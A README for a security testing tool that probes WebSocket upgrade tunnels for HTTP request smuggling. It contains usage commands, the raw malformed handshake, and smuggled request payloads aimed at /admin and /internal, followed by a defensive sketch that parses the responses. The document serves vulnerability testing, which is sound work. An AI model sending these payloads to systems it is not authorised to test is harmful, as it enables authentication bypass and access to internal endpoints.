
ordinary-hacker/ws-smuggler

ws_smuggler.py

A CLI tool to test for WebSocket Upgrade Tunnel HTTP Request Smuggling vulnerabilities. This technique abuses misconfigured frontends (e.g., proxies, CDNs) that assume WebSocket upgrades are successful and tunnel raw traffic to backends that may not have switched protocols.

By crafting invalid upgrade requests and appending a second HTTP request, this tool attempts to identify systems vulnerable to request smuggling and security bypasses.


🚀 Features

  • Sends invalid WebSocket upgrade requests

  • Attempts to smuggle arbitrary HTTP requests through the tunnel

  • Auto-generates simple GET requests or allows full custom smuggled request files

  • Supports:

    • HTTPS
    • Custom timeouts
    • Verbose / quiet modes
    • Response analysis and status code parsing

🛠️ Installation

Requirements

  • Python 3.6+
  • termcolor library:
pip install termcolor

Or:

pip install -r requirements.txt

🧪 Usage

python3 ws_smuggler.py [options] <url> <smuggled_path>

🔹 Example: Default GET request

python3 ws_smuggler.py http://target.site/ /admin

🔹 Example: Custom request from file

python3 ws_smuggler.py https://example.com/ /admin --request my_payload.txt

🔹 Optional Flags

    Option          Description
    --version       Custom Sec-WebSocket-Version header (default: 9999)
    --timeout       Socket timeout in seconds (default: 5.0)
    --request       Load full smuggled HTTP request from a .txt file
    --show-payload  Print the full raw payload before sending
    --verbose       Show all request/response output
    --quiet         Suppress all non-critical output

📂 Custom Request Format

When using --request, the file should contain a full, valid HTTP request (e.g., a POST with headers and body):

POST /internal HTTP/1.1
Host: target.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

username=admin&pw=1

🔍 How It Works

  1. Sends a fake WebSocket handshake using an invalid version:

    GET / HTTP/1.1
    Host: target
    Upgrade: websocket
    Connection: Upgrade
    Sec-WebSocket-Version: 9999

  2. Appends a second HTTP request right after:

    GET /admin HTTP/1.1
    Host: target

  3. If the frontend tunnels blindly and the backend keeps interpreting HTTP, the second request may execute, which indicates a vulnerability.


🛡️ Detection Logic

  • Multiple HTTP responses detected from the same connection

  • Focus on the status of the second response (e.g., 200 OK, 403, etc.)

  • Useful for finding:

    • Auth bypasses
    • WAF/proxy misconfigurations
    • Cache or internal endpoint exposures
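
The detection logic above, sketched as an added example (not code from ws_smuggler.py): it splits the bytes read from one connection into HTTP responses and flags a second response that follows a rejected upgrade. The function names, verdict strings and sample bytes are assumptions made for illustration, and only Content-Length framing is handled.

```python
import re

STATUS_LINE = re.compile(rb"HTTP/1\.[01] (\d{3})[^\r\n]*\r\n")

def split_responses(raw: bytes):
    """Split bytes read from one connection into (status, headers, body) tuples.

    Handles Content-Length framing only; chunked bodies are out of scope here.
    """
    responses, pos = [], 0
    while pos < len(raw):
        m = STATUS_LINE.match(raw, pos)
        head_end = raw.find(b"\r\n\r\n", pos)
        if not m or head_end == -1:
            break  # trailing bytes that are not a complete HTTP response
        headers = {}
        for line in raw[m.end():head_end].split(b"\r\n"):
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get(b"content-length", b"0"))
        body_start = head_end + 4
        responses.append((int(m.group(1)), headers, raw[body_start:body_start + length]))
        pos = body_start + length
    return responses

def assess(raw: bytes):
    """Apply the detection logic: a rejected upgrade followed by a second response."""
    statuses = [status for status, _, _ in split_responses(raw)]
    if not statuses:
        return "no-http-response", statuses
    if statuses[0] == 101:
        return "upgrade-accepted", statuses  # a genuine WebSocket tunnel, not this issue
    if len(statuses) > 1:
        return "second-request-processed", statuses
    return "not-tunnelled", statuses

# Constructed sample: bytes captured from a single TCP connection.
SAMPLE = (
    b"HTTP/1.1 426 Upgrade Required\r\nContent-Length: 7\r\n\r\nbad ver"
    b"HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    print(assess(SAMPLE))
```

A "second-request-processed" verdict means the frontend kept forwarding bytes after the backend refused the upgrade; the fix on the frontend side is to open the tunnel only after the backend answers 101.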

📄 License

MIT License


📫 Author

Built by 0rd1n4ry — based on smuggling techniques described by 0ang3el, James Kettle, and others in the research community.

